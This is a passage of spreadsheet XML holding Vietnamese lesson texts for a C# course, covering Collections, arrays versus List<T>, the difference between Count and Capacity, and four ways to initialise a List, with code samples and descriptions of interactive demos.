Thiếu các phương thức tiện ích: Mảng chỉ cung cấp các chức năng cơ bản như truy cập phần tử theo chỉ mục. Để thực hiện các thao tác phức tạp hơn như tìm kiếm một phần tử cụ thể, sắp xếp danh sách, hoặc kiểm tra sự tồn tại của một phần tử, bạn phải tự viết các vòng lặp và thuật toán.
Collections cung cấp hàng loạt các phương thức được xây dựng sẵn để thực hiện các tác vụ này, giúp mã của bạn ngắn gọn hơn, dễ đọc hơn và ít lỗi hơn. Ví dụ, bạn có thể gọi một phương thức Sort() để sắp xếp toàn bộ Collection chỉ trong một dòng lệnh.
An toàn kiểu (Type Safety): Mặc dù mảng cũng có thể được định kiểu (int[], string[]), nhưng việc sử dụng các mảng kiểu object[] để lưu trữ nhiều kiểu dữ liệu khác nhau có thể dẫn đến các lỗi thời gian chạy (runtime errors) và yêu cầu ép kiểu (casting), gây giảm hiệu suất do boxing/unboxing.
Các Collections hiện đại trong .NET Framework (đặc biệt là các generic collections) được thiết kế để đảm bảo an toàn kiểu mà không cần ép kiểu thủ công, giúp phát hiện lỗi ngay tại thời điểm biên dịch và cải thiện hiệu suất.
Tóm lại, Collections cung cấp một giải pháp mạnh mẽ và linh hoạt hơn nhiều so với mảng truyền thống, đặc biệt là khi bạn cần quản lý các tập hợp dữ liệu có kích thước thay đổi hoặc cần thực hiện nhiều thao tác phức tạp.
Các loại Collection phổ biến trong .NET Framework
.NET Framework cung cấp một thư viện phong phú các Collection, mỗi loại được thiết kế để giải quyết các bài toán cụ thể. Dưới đây là một số loại phổ biến nhất mà bạn sẽ thường xuyên gặp trong lập trình C#:
List&lt;T&gt;: Đây là một trong những Collection được sử dụng rộng rãi nhất. List&lt;T&gt; đại diện cho một danh sách các đối tượng có thể truy cập theo chỉ mục. Nó có kích thước động, cho phép bạn thêm, xóa và truy cập các phần tử một cách dễ dàng. List&lt;T&gt; lý tưởng cho các tình huống cần lưu trữ một chuỗi các phần tử có thứ tự.
Bạn sẽ tìm hiểu sâu hơn về List&lt;T&gt; trong các bài học tiếp theo, bao gồm khái niệm, cách khởi tạo, thêm, truy cập và xóa các phần tử.
Dictionary&lt;TKey, TValue&gt;: Collection này lưu trữ dữ liệu dưới dạng các cặp khóa-giá trị (key-value pairs). Mỗi khóa là duy nhất và được sử dụng để truy xuất giá trị tương ứng một cách nhanh chóng. Dictionary&lt;TKey, TValue&gt; rất hữu ích khi bạn cần tìm kiếm dữ liệu dựa trên một định danh duy nhất, giống như một cuốn từ điển nơi mỗi từ (khóa) có một định nghĩa (giá trị).
HashSet&lt;T&gt;: HashSet&lt;T&gt; là một tập hợp các phần tử không có thứ tự và không chứa các phần tử trùng lặp. Nó tối ưu cho các thao tác kiểm tra sự tồn tại của một phần tử, hợp nhất (union), giao (intersection) và hiệu (difference) giữa các tập hợp.
Queue&lt;T&gt;: Queue&lt;T&gt; (hàng đợi) là một Collection hoạt động theo nguyên tắc "Vào trước, Ra trước" (FIFO - First-In, First-Out). Các phần tử được thêm vào cuối hàng đợi và được lấy ra từ đầu hàng đợi. Tương tự như một hàng người xếp hàng chờ mua vé.
Stack&lt;T&gt;: Stack&lt;T&gt; (ngăn xếp) là một Collection hoạt động theo nguyên tắc "Vào sau, Ra trước" (LIFO - Last-In, First-Out). Các phần tử được thêm vào (push) và lấy ra (pop) từ cùng một đầu của ngăn xếp. Tương tự như một chồng đĩa, bạn chỉ có thể thêm hoặc lấy đĩa từ trên cùng.
Việc lựa chọn đúng Collection cho bài toán của bạn là một kỹ năng quan trọng, giúp tối ưu hóa hiệu suất và làm cho mã của bạn dễ quản lý hơn.
Namespace System.Collections.Generic
Hầu hết các Collection phổ biến và mạnh mẽ mà chúng ta vừa thảo luận (như List&lt;T&gt;, Dictionary&lt;TKey, TValue&gt;, HashSet&lt;T&gt;, Queue&lt;T&gt;, Stack&lt;T&gt;) đều thuộc về namespace System.Collections.Generic.
Namespace này chứa các generic collections. Từ "generic" (tổng quát) ở đây có nghĩa là các Collection này được thiết kế để hoạt động với bất kỳ kiểu dữ liệu nào mà bạn chỉ định, mà vẫn đảm bảo an toàn kiểu.
Ví dụ, khi bạn khai báo List&lt;string&gt;, bạn đang tạo một danh sách chỉ có thể chứa các đối tượng kiểu string. Điều này giúp trình biên dịch kiểm tra lỗi ngay lập tức nếu bạn cố gắng thêm một kiểu dữ liệu khác vào danh sách này, đồng thời tránh được chi phí hiệu suất của việc boxing/unboxing khi làm việc với các kiểu giá trị.
Để sử dụng các Collection từ namespace này, bạn cần thêm câu lệnh using vào đầu file mã nguồn của mình:
using System;
using System.Collections.Generic; // Cần thiết để sử dụng List&lt;T&gt;, Dictionary&lt;TKey, TValue&gt;, v.v.
public class ChuongTrinh
{
    public static void Main(string[] args)
    {
        List&lt;string&gt; tenSinhVien = new List&lt;string&gt;();
        tenSinhVien.Add("Nguyễn Văn A");
        tenSinhVien.Add("Trần Thị B");
        foreach (string ten in tenSinhVien)
        {
            Console.WriteLine(ten);
        }
    }
}
Trong các bài học tiếp theo, chúng ta sẽ đi sâu vào cách làm việc với List&lt;T&gt;, khám phá các phương thức và thuộc tính của nó để bạn có thể tự tin quản lý các tập hợp dữ liệu trong ứng dụng C# của mình.</t>
        </is>
      </c>
      <c r="W2" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu Collections trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích Collection (tập hợp) là gì và vì sao cần dùng nó.
- Nêu hai hạn chế chính của mảng: kích thước cố định và thiếu phương thức tiện ích.
- Kể tên các collection phổ biến: `List&lt;T&gt;`, `Dictionary&lt;TKey, TValue&gt;`, `HashSet&lt;T&gt;`, `Queue&lt;T&gt;`, `Stack&lt;T&gt;`.
- Nhận ra namespace `System.Collections.Generic` và ý nghĩa của "generic".
- Quan sát mảng báo lỗi khi hết chỗ, còn `List&lt;T&gt;` tự mở rộng, bằng hoạt động mô phỏng.
## Collection là gì?
Một **Collection** (tập hợp) là một cấu trúc dữ liệu dùng để lưu và quản lý một nhóm đối tượng. Hãy nghĩ đến danh sách đồ cần mua, danh sách sinh viên trong lớp hay danh sách bài hát yêu thích. Thay vì khai báo từng biến riêng lẻ, bạn gom chúng vào một đơn vị duy nhất.
Collection giúp bạn:
- **Quản lý nhóm dữ liệu** một cách có tổ chức, truy cập nhiều phần tử cùng lúc.
- **Thao tác nhanh**: có sẵn các phương thức để thêm, xóa, tìm kiếm, sắp xếp.
- **Tái sử dụng**: cùng một collection dùng được cho nhiều kiểu dữ liệu khác nhau.
## Vì sao không chỉ dùng mảng?
Bạn đã biết **mảng** (array). Mảng rất tiện, nhưng có hai hạn chế khi dữ liệu thay đổi thường xuyên.
**1. Kích thước cố định.** Số ô được quyết định lúc tạo và không đổi được nữa. Muốn thêm phần tử vượt giới hạn, bạn phải tạo mảng mới rồi chép dữ liệu sang.
```csharp
int[] a = new int[3];   // đúng 3 ô: chỉ số 0, 1, 2
a[3] = 7;               // lỗi lúc chạy: IndexOutOfRangeException
```
**2. Thiếu phương thức tiện ích.** Mảng chủ yếu cho phép đọc và ghi theo chỉ số. Muốn tìm, xóa hay sắp xếp, bạn thường phải tự viết vòng lặp.
Collection khắc phục cả hai: hầu hết có **kích thước động** (tự co giãn khi thêm hoặc xóa) và đi kèm nhiều phương thức dựng sẵn.
| Tiêu chí | Mảng `int[]` | `List&lt;int&gt;` |
|---|---|---|
| Kích thước | Cố định lúc tạo | Tự mở rộng khi `Add` |
| Số phần tử hiện có | `Length` | `Count` |
| Thêm, xóa, tìm, sắp xếp | Tự viết vòng lặp | Có sẵn phương thức |
## Các collection phổ biến
| Collection | Ý chính | Hình dung |
|---|---|---|
| `List&lt;T&gt;` | Danh sách có thứ tự, truy cập theo chỉ số, tự co giãn | Danh sách mua sắm |
| `Dictionary&lt;TKey, TValue&gt;` | Lưu cặp khóa - giá trị, tra theo khóa rất nhanh | Từ điển |
| `HashSet&lt;T&gt;` | Tập hợp không trùng lặp, không quan tâm thứ tự | Tập hợp trong toán học |
| `Queue&lt;T&gt;` | Vào trước, ra trước (FIFO) | Hàng người xếp mua vé |
| `Stack&lt;T&gt;` | Vào sau, ra trước (LIFO) | Chồng đĩa |
Chọn đúng collection cho bài toán giúp mã gọn hơn và chạy hiệu quả hơn. Các bài sau sẽ đi sâu vào `List&lt;T&gt;` trước, rồi đến `Dictionary&lt;TKey, TValue&gt;`.
## Namespace System.Collections.Generic
Các collection trên nằm trong namespace `System.Collections.Generic`. Từ **generic** (tổng quát) nghĩa là collection hoạt động với kiểu dữ liệu do bạn chỉ định trong cặp `&lt; &gt;`, và vẫn **an toàn kiểu** (type safety). Ví dụ `List&lt;string&gt;` chỉ chứa `string`. Nếu bạn thêm một số vào, trình biên dịch báo lỗi ngay, không phải đợi đến lúc chạy.
Để dùng, hãy thêm `using` ở đầu file:
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        List&lt;string&gt; names = new List&lt;string&gt;();
        names.Add("Lan");
        names.Add("Minh");
        foreach (string name in names)
        {
            Console.WriteLine(name);
        }
        // Lan
        // Minh
    }
}
```
## Hoạt động: Mảng cố định và List tự mở rộng
Mô phỏng dưới đây có hai cột cùng lưu năm điểm 8, 6, 9, 7, 10. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Thêm phần tử thứ 4 và thứ 5**. Quan sát **cột trái** (mảng `int[]`). `new int[3]` tạo đúng 3 ô, mỗi ô mang giá trị 0, `Length` là 3. Ba dòng `a[0] = 8`, `a[1] = 6`, `a[2] = 9` lấp đầy 3 ô. Đến `a[3] = 7`, không còn ô số 3, nên thẻ lỗi đỏ **IndexOutOfRangeException** hiện ra với thông báo "Index was outside the bounds of the array." và chương trình dừng.
- Nhìn sang **cột phải** (`List&lt;int&gt;`). List mới tạo còn rỗng, `Count` 0 và `Capacity` 0. Lần `Add(8)` đầu tiên, List cấp sẵn 4 chỗ (các ô nét đứt là chỗ còn trống). `Add(6)` và `Add(9)` chỉ đặt vào ô kế tiếp, `Count` lên 3. `Add(7)` lấp ô dự phòng cuối: `Count` 4, `Capacity` 4, List đã đầy.
- Với `Add(10)`, List hết chỗ. Hãy xem hình: List cấp một dãy mới gấp đôi (8 ô), chép 4 phần tử sang, dãy cũ mờ đi vì bị bỏ. Sau đó 10 vào ô số 4. Kết quả cuối: `Count` 5, `Capacity` 8, không có lỗi nào.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/gioi-thieu-collections-trong-c-sharp/" title="Giới thiệu Collections trong C#" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mảng có kích thước cố định nên thêm phần tử thứ 4 vào mảng 3 ô là lỗi. `List&lt;T&gt;` tự cấp thêm chỗ khi cần, bạn chỉ việc gọi `Add`. Việc nhân đôi `Capacity` (4 rồi 8) là chi tiết cài đặt của .NET, chỉ nêu để bạn hình dung.
## Tóm tắt
- **Collection** là cấu trúc dữ liệu để lưu và quản lý một nhóm đối tượng.
- Mảng có kích thước cố định và ít phương thức tiện ích. Collection thường có kích thước động và nhiều phương thức dựng sẵn.
- Các collection phổ biến: `List&lt;T&gt;`, `Dictionary&lt;TKey, TValue&gt;`, `HashSet&lt;T&gt;`, `Queue&lt;T&gt;`, `Stack&lt;T&gt;`.
- Chúng nằm trong `System.Collections.Generic`. "Generic" nghĩa là chỉ định kiểu dữ liệu và được kiểm tra kiểu ngay lúc biên dịch.
- `List&lt;T&gt;` tự mở rộng khi `Add`, còn mảng thì báo `IndexOutOfRangeException` khi vượt kích thước.</t>
        </is>
      </c>
    </row>
    <row r="3" ht="409.6" customHeight="1" s="18">
      <c r="A3" s="10" t="n">
        <v>2</v>
      </c>
      <c r="B3" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C3" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu về Collections và List&lt;T&gt; cơ bản</t>
        </is>
      </c>
      <c r="D3" s="10" t="inlineStr">
        <is>
          <t>Khái niệm và Khởi tạo List&lt;T&gt;</t>
        </is>
      </c>
      <c r="E3" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F3" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G3" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H3" s="10" t="inlineStr">
        <is>
          <t>Phân biệt 4 cách khởi tạo List&lt;T&gt; và hiểu Count (số phần tử thật) khác Capacity (chỗ đã chuẩn bị).</t>
        </is>
      </c>
      <c r="I3" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J3" s="10" t="inlineStr">
        <is>
          <t>Dãy ô List với ô dự phòng nét đứt; hai ô biến lớn Count và Capacity. Tab 'Từ mảng' đặt dãy ô mảng và dãy ô List cạnh nhau để thấy là hai bản riêng.</t>
        </is>
      </c>
      <c r="K3" s="10" t="inlineStr">
        <is>
          <t>H01</t>
        </is>
      </c>
      <c r="L3" s="10" t="inlineStr">
        <is>
          <t>Rỗng | Có sức chứa ban đầu | Khởi tạo kèm giá trị | Từ mảng có sẵn</t>
        </is>
      </c>
      <c r="M3" s="10" t="inlineStr">
        <is>
          <t>Tab Rỗng: new List&lt;string&gt;() → Count 0, Capacity 0; Add("An") → Count 1, Capacity 4.
Tab Sức chứa: new List&lt;string&gt;(10) → 10 ô nét đứt, Count vẫn 0. Thử names[0] khi chưa Add → ArgumentOutOfRangeException: Capacity không phải số phần tử.
Tab Kèm giá trị: new List&lt;string&gt; { "An", "Bình", "Chi" } → mô phỏng cho thấy trình biên dịch gọi Add 3 lần.
Tab Từ mảng: int[] arr = {1, 2, 3}; var list = new List&lt;int&gt;(arr) → dữ liệu được chép. Đổi arr[0] = 99, list[0] vẫn là 1.
Bước cuối mỗi tab: ghi chú Count và Capacity.</t>
        </is>
      </c>
      <c r="N3" s="10" t="inlineStr">
        <is>
          <t>Tên: An, Bình, Chi; mảng {1, 2, 3}</t>
        </is>
      </c>
      <c r="O3" s="10" t="inlineStr">
        <is>
          <t>Count là số phần tử đang có; Capacity là chỗ đã cấp sẵn. Chỉ truy cập được chỉ số 0 đến Count − 1.</t>
        </is>
      </c>
      <c r="P3" s="10" t="inlineStr">
        <is>
          <t>list[i] với i ≥ Count ném ArgumentOutOfRangeException (khác mảng: IndexOutOfRangeException). Collection initializer thực chất gọi Add.</t>
        </is>
      </c>
      <c r="Q3" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/khai-niem-va-khoi-tao-list-t/index.html</t>
        </is>
      </c>
      <c r="R3" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-collections-va-list-t-co-ban/khai-niem-va-khoi-tao-list-t/</t>
        </is>
      </c>
      <c r="S3" s="10" t="n"/>
      <c r="T3" s="12" t="n"/>
      <c r="U3" s="12" t="n"/>
      <c r="V3" s="21" t="inlineStr">
        <is>
          <t>List&lt;T&gt; là gì?
Trong lập trình C#, khi bạn cần quản lý một tập hợp các đối tượng cùng kiểu, List&lt;T&gt; là một trong những cấu trúc dữ liệu mạnh mẽ và được sử dụng phổ biến nhất. List&lt;T&gt; là một lớp thuộc không gian tên System.Collections.Generic, đại diện cho một danh sách các đối tượng được nhập mạnh (strongly typed) có thể được truy cập bằng chỉ mục. Chữ T trong List&lt;T&gt; là một tham số kiểu (type parameter), cho phép bạn chỉ định kiểu dữ liệu mà danh sách sẽ chứa.
Các đặc điểm nổi bật của List&lt;T&gt;:
Kích thước động: Không giống như mảng (Array) có kích thước cố định, List&lt;T&gt; có thể tự động co giãn khi bạn thêm hoặc xóa phần tử. Điều này giúp bạn linh hoạt hơn rất nhiều trong việc quản lý dữ liệu mà không cần phải lo lắng về việc cấp phát lại bộ nhớ thủ công.
Được nhập mạnh (Strongly Typed): Khi bạn khai báo một List&lt;T&gt; (ví dụ: List&lt;int&gt;, List&lt;string&gt;), danh sách đó chỉ có thể chứa các phần tử thuộc kiểu T đã được chỉ định. Điều này giúp phát hiện lỗi kiểu dữ liệu ngay tại thời điểm biên dịch, tăng cường tính an toàn và dễ bảo trì của mã nguồn.
Có thứ tự: Các phần tử trong List&lt;T&gt; được duy trì theo thứ tự chúng được thêm vào và có thể được truy cập thông qua chỉ mục (index) bắt đầu từ 0.
Cung cấp nhiều phương thức tiện ích:List&lt;T&gt; đi kèm với rất nhiều phương thức dựng sẵn để thêm, xóa, tìm kiếm, sắp xếp và thao tác với các phần tử một cách dễ dàng.
So sánh List&lt;T&gt; với Mảng (Array)
Mặc dù cả List&lt;T&gt; và mảng đều có thể lưu trữ một tập hợp các phần tử cùng kiểu và truy cập bằng chỉ mục, chúng có những khác biệt cơ bản:
Trong hầu hết các trường hợp ứng dụng thực tế, List&lt;T&gt; là lựa chọn ưu tiên khi bạn cần một danh sách linh hoạt và dễ thao tác.
Khai báo và Khởi tạo List&lt;T&gt; rỗng
Để sử dụng List&lt;T&gt;, trước tiên bạn cần khai báo một biến kiểu List&lt;T&gt; và sau đó khởi tạo một đối tượng List&lt;T&gt; mới.
Cú pháp cơ bản để khai báo và khởi tạo một List&lt;T&gt; rỗng là:
List&lt;T&gt; tenBienDanhSach = new List&lt;T&gt;();
Trong đó:
T là kiểu dữ liệu của các phần tử mà danh sách sẽ chứa (ví dụ: int, string, double, hoặc một kiểu đối tượng tùy chỉnh).
tenBienDanhSach là tên mà bạn đặt cho biến danh sách của mình.
Ví dụ:
// Khai báo và khởi tạo một List rỗng chứa các số nguyên
List&lt;int&gt; danhSachSoNguyen = new List&lt;int&gt;();
// Khai báo và khởi tạo một List rỗng chứa các chuỗi
List&lt;string&gt; danhSachTen = new List&lt;string&gt;();
// Khai báo và khởi tạo một List rỗng chứa các số thập phân
List&lt;double&gt; danhSachDiem = new List&lt;double&gt;();
// Bạn có thể kiểm tra số lượng phần tử hiện có bằng thuộc tính Count
Console.WriteLine($"Số lượng số nguyên: {danhSachSoNguyen.Count}"); // Kết quả: 0
Console.WriteLine($"Số lượng tên: {danhSachTen.Count}");         // Kết quả: 0
Khi bạn khởi tạo một List&lt;T&gt; rỗng bằng new List&lt;T&gt;(), nó sẽ tạo ra một danh sách trống. Bạn có thể bắt đầu thêm các phần tử vào danh sách này sau đó (các phương thức thêm phần tử sẽ được tìm hiểu chi tiết trong bài học tiếp theo).
Khởi tạo với dung lượng ban đầu (Capacity)
Mặc dù List&lt;T&gt; có kích thước động, bạn có thể tùy chọn cung cấp một dung lượng ban đầu (initial capacity) cho danh sách khi khởi tạo. Điều này hữu ích khi bạn biết trước (hoặc ước tính) số lượng phần tử mà danh sách sẽ chứa, giúp tối ưu hiệu suất bằng cách tránh các hoạt động cấp phát lại bộ nhớ không cần thiết khi danh sách mở rộng.
// Khởi tạo một List&lt;string&gt; rỗng với dung lượng ban đầu là 10 phần tử
List&lt;string&gt; danhSachMonHoc = new List&lt;string&gt;(10);
Console.WriteLine($"Dung lượng ban đầu của danh sách môn học: {danhSachMonHoc.Capacity}"); // Kết quả: 10
Console.WriteLine($"Số lượng phần tử trong danh sách môn học: {danhSachMonHoc.Count}");   // Kết quả: 0 (vẫn rỗng)
Lưu ý rằng Capacity (dung lượng) khác với Count (số lượng phần tử). Capacity là số lượng phần tử mà List&lt;T&gt; có thể chứa trước khi cần phải cấp phát lại bộ nhớ bên trong, trong khi Count là số lượng phần tử thực tế đang có trong danh sách.
Khởi tạo List&lt;T&gt; với các phần tử ban đầu (Collection Initializer)
C# cung cấp một cú pháp tiện lợi gọi là Collection Initializer (bộ khởi tạo tập hợp) để khởi tạo một List&lt;T&gt; và điền các phần tử vào nó ngay lập tức. Điều này giúp mã nguồn của bạn trở nên gọn gàng và dễ đọc hơn.
Cú pháp sử dụng dấu ngoặc nhọn {} ngay sau lệnh khởi tạo new List&lt;T&gt;(), với các phần tử được phân tách bằng dấu phẩy:
List&lt;T&gt; tenBienDanhSach = new List&lt;T&gt;
{
    phanTu1,
    phanTu2,
    // ...
    phanTuN
};
Ví dụ:
// Khởi tạo List&lt;string&gt; với các tên học sinh ban đầu
List&lt;string&gt; hocSinhs = new List&lt;string&gt;
{
    "Nguyễn Văn A",
    "Trần Thị B",
    "Lê Hoàng C",
    "Phạm Minh D"
};
Console.WriteLine($"Số lượng học sinh: {hocSinhs.Count}"); // Kết quả: 4
// Khởi tạo List&lt;int&gt; với các số chẵn ban đầu
List&lt;int&gt; soChan = new List&lt;int&gt; { 2, 4, 6, 8, 10 };
Console.WriteLine($"Số lượng số chẵn: {soChan.Count}");   // Kết quả: 5
Collection Initializer là một cách rất hiệu quả để tạo ra một danh sách với dữ liệu ban đầu, đặc biệt khi bạn có một tập hợp các phần tử cố định hoặc đã biết trước.
Các loại dữ liệu có thể lưu trữ trong List&lt;T&gt;
Vì List&lt;T&gt; là một cấu trúc dữ liệu generic và được nhập mạnh, bạn có thể tạo danh sách chứa hầu hết mọi kiểu dữ liệu trong C#.
1. Kiểu dữ liệu nguyên thủy (Primitive Types) và Kiểu cấu trúc (Structs)
Bạn có thể lưu trữ các kiểu dữ liệu cơ bản như số nguyên, số thực, ký tự, boolean, hoặc các kiểu cấu trúc (struct) tùy chỉnh.
// List chứa số nguyên (int)
List&lt;int&gt; danhSachTuoi = new List&lt;int&gt; { 25, 30, 22, 45 };
// List chứa số thực (double)
List&lt;double&gt; danhSachGia = new List&lt;double&gt; { 19.99, 5.50, 120.00 };
// List chứa ký tự (char)
List&lt;char&gt; danhSachKyTu = new List&lt;char&gt; { 'a', 'b', 'c', 'd' };
// List chứa boolean
List&lt;bool&gt; danhSachTrangThai = new List&lt;bool&gt; { true, false, true };
2. Kiểu dữ liệu tham chiếu (Reference Types)
List&lt;T&gt; cũng rất mạnh mẽ khi làm việc với các kiểu dữ liệu tham chiếu, bao gồm string và các đối tượng của lớp (class) do bạn tự định nghĩa.
// List chứa chuỗi (string)
List&lt;string&gt; danhSachTenQuocGia = new List&lt;string&gt; { "Việt Nam", "Mỹ", "Nhật Bản", "Hàn Quốc" };
// Ví dụ với một lớp tùy chỉnh (giả định có lớp SinhVien)
public class SinhVien
{
    public int MaSV { get; set; }
    public string TenSV { get; set; }
    public SinhVien(int maSV, string tenSV)
    {
        MaSV = maSV;
        TenSV = tenSV;
    }
}
// List chứa các đối tượng SinhVien
List&lt;SinhVien&gt; danhSachSinhVien = new List&lt;SinhVien&gt;
{
    new SinhVien(101, "Nguyễn Văn An"),
    new SinhVien(102, "Trần Thị Bình"),
    new SinhVien(103, "Lê Văn Cường")
};
Console.WriteLine($"Sinh viên đầu tiên: {danhSachSinhVien[0].TenSV}"); // Kết quả: Nguyễn Văn An
3. List (Lưu trữ các kiểu hỗn hợp)
Mặc dù List&lt;T&gt; được thiết kế để nhập mạnh, bạn có thể sử dụng List&lt;object&gt; nếu bạn thực sự cần lưu trữ các phần tử thuộc nhiều kiểu dữ liệu khác nhau trong cùng một danh sách. Tuy nhiên, việc này thường không được khuyến khích vì:
Mất an toàn kiểu dữ liệu: Trình biên dịch sẽ không thể kiểm tra kiểu dữ liệu tại thời điểm biên dịch, dẫn đến khả năng xảy ra lỗi InvalidCastException khi bạn cố gắng ép kiểu một đối tượng sai kiểu.
Hiệu suất: Đối với các kiểu giá trị (như int, double), việc lưu trữ chúng trong List&lt;object&gt; sẽ gây ra hiện tượng boxing (đóng gói kiểu giá trị vào một đối tượng), và khi truy cập, bạn sẽ phải thực hiện unboxing (giải phóng khỏi đối tượng). Các hoạt động boxing/unboxing có thể làm giảm hiệu suất.
Ví dụ về List (Sử dụng cẩn trọng):
List&lt;object&gt; danhSachHonHop = new List&lt;object&gt;
{
    123,                // int
    "Hello World",      // string
    3.14,               // double
    true,               // bool
    new SinhVien(201, "Dương Thị E") // Đối tượng tùy chỉnh
};
// Cần ép kiểu rõ ràng và kiểm tra kiểu trước khi sử dụng
if (danhSachHonHop[0] is int soNguyen)
{
    Console.WriteLine($"Phần tử đầu tiên là số nguyên: {soNguyen}");
}
// Nếu không kiểm tra, có thể gặp lỗi ép kiểu
// string ten = (string)danhSachHonHop[0]; // Sẽ gây lỗi InvalidCastException
Trong hầu hết các trường hợp, việc thiết kế mã nguồn của bạn sao cho List&lt;T&gt; chứa các đối tượng cùng một kiểu cụ thể là phương pháp tốt nhất, đảm bảo tính an toàn, dễ bảo trì và hiệu suất cao. Nếu bạn cần lưu trữ dữ liệu hỗn hợp một cách có cấu trúc, hãy cân nhắc sử dụng các kỹ thuật khác như tạo một lớp cơ sở chung, interface, hoặc sử dụng các cấu trúc dữ liệu khác như Dictionary&lt;string, object&gt;.</t>
        </is>
      </c>
      <c r="W3" s="22" t="inlineStr">
        <is>
          <t># Khái niệm và Khởi tạo List&lt;T&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích `List&lt;T&gt;` là gì và ý nghĩa của tham số kiểu `T`.
- Phân biệt `Count` (số phần tử thật) với `Capacity` (chỗ đã cấp sẵn).
- Khởi tạo `List&lt;T&gt;` theo bốn cách: rỗng, có sức chứa ban đầu, kèm giá trị, từ mảng có sẵn.
- Giải thích vì sao đổi mảng gốc không làm đổi `List&lt;T&gt;` đã tạo từ mảng đó.
- Quan sát `Count` và `Capacity` thay đổi ở từng cách khởi tạo bằng hoạt động mô phỏng.
## List&lt;T&gt; là gì?
`List&lt;T&gt;` là lớp trong namespace `System.Collections.Generic`, đại diện cho một **danh sách có thứ tự** các phần tử cùng kiểu, truy cập được bằng **chỉ số** (index) bắt đầu từ 0. Chữ `T` là **tham số kiểu** (type parameter): bạn thay nó bằng kiểu dữ liệu muốn lưu, như `List&lt;int&gt;` hay `List&lt;string&gt;`.
Đặc điểm nổi bật:
- **Kích thước động:** tự co giãn khi thêm hoặc xóa phần tử, khác với mảng.
- **Gõ mạnh (strongly typed):** `List&lt;string&gt;` chỉ chứa `string`, lỗi kiểu được báo ngay lúc biên dịch.
- **Có thứ tự:** phần tử nằm theo thứ tự được thêm vào.
- **Nhiều phương thức sẵn có:** thêm, xóa, tìm, sắp xếp.
| Tiêu chí | Mảng | `List&lt;T&gt;` |
|---|---|---|
| Kích thước | Cố định | Tự thay đổi |
| Số phần tử | `Length` | `Count` |
| Thêm, xóa | Không có sẵn | `Add`, `Insert`, `Remove`... |
Khi cần một danh sách linh hoạt, `List&lt;T&gt;` thường là lựa chọn đầu tiên.
## Count và Capacity
Bên trong, `List&lt;T&gt;` giữ một dãy ô. Hai con số cần phân biệt:
- **`Count`**: số phần tử đang có thật trong danh sách.
- **`Capacity`**: số ô List đã cấp sẵn. Luôn lớn hơn hoặc bằng `Count`.
Capacity là chỗ dự phòng để lần `Add` sau không phải cấp thêm bộ nhớ. Bạn chỉ **đọc được các chỉ số từ 0 đến `Count - 1`**, không phải đến `Capacity - 1`.
## Bốn cách khởi tạo
### Cách 1: List rỗng
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var names = new List&lt;string&gt;();
        Console.WriteLine(names.Count);      // 0
        Console.WriteLine(names.Capacity);   // 0
        names.Add("An");
        Console.WriteLine(names.Capacity);   // 4 (lần Add đầu cấp sẵn 4 chỗ)
        names.Add("Bình");
        Console.WriteLine(names.Count);      // 2
        Console.WriteLine(names.Capacity);   // 4
    }
}
```
List rỗng có `Count` 0 và `Capacity` 0. Lần `Add` đầu tiên cấp sẵn 4 chỗ.
### Cách 2: Có sức chứa ban đầu
Nếu biết trước khoảng bao nhiêu phần tử, bạn truyền số đó vào hàm khởi tạo để tránh phải cấp thêm chỗ về sau:
```csharp
var names = new List&lt;string&gt;(10);
Console.WriteLine(names.Count);      // 0
Console.WriteLine(names.Capacity);   // 10
// var x = names[0];                 // lỗi: ArgumentOutOfRangeException
```
Mười ô dự phòng **chưa phải phần tử**. List vẫn rỗng, nên đọc `names[0]` sẽ ném `ArgumentOutOfRangeException`.
### Cách 3: Khởi tạo kèm giá trị
**Collection initializer** (bộ khởi tạo tập hợp) cho phép liệt kê giá trị trong cặp ngoặc nhọn:
```csharp
var names = new List&lt;string&gt;
{
    "An",
    "Bình",
    "Chi"
};
Console.WriteLine(names.Count);   // 3
```
Trình biên dịch thực chất tạo List rỗng, rồi gọi `Add` cho từng giá trị. Viết gọn hay gọi `Add` từng lần đều cho kết quả giống nhau: `Count` 3, `Capacity` 4.
### Cách 4: Từ mảng có sẵn
```csharp
int[] arr = { 1, 2, 3 };
var list = new List&lt;int&gt;(arr);
arr[0] = 99;
Console.WriteLine(list[0]);   // 1
```
`new List&lt;int&gt;(arr)` **chép** từng phần tử sang một nơi riêng, nên mảng và List là hai bản độc lập. Đổi `arr` sau đó không ảnh hưởng `list`. Lúc này `Count` và `Capacity` đều là 3.
## Hoạt động: Bốn cách tạo List
Mô phỏng dưới đây có bốn tab, mỗi tab là một cách khởi tạo. Hãy để ý hai ô **Count** và **Capacity**. Bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Rỗng**. `new List&lt;string&gt;()` cho Count 0 và Capacity 0 (chưa có ô nào). `Add("An")` làm List cấp sẵn 4 chỗ (nét đứt) và đặt "An" vào ô 0: Count 1, Capacity 4. `Add("Bình")` chỉ đặt vào ô kế tiếp: Count 2, Capacity vẫn 4.
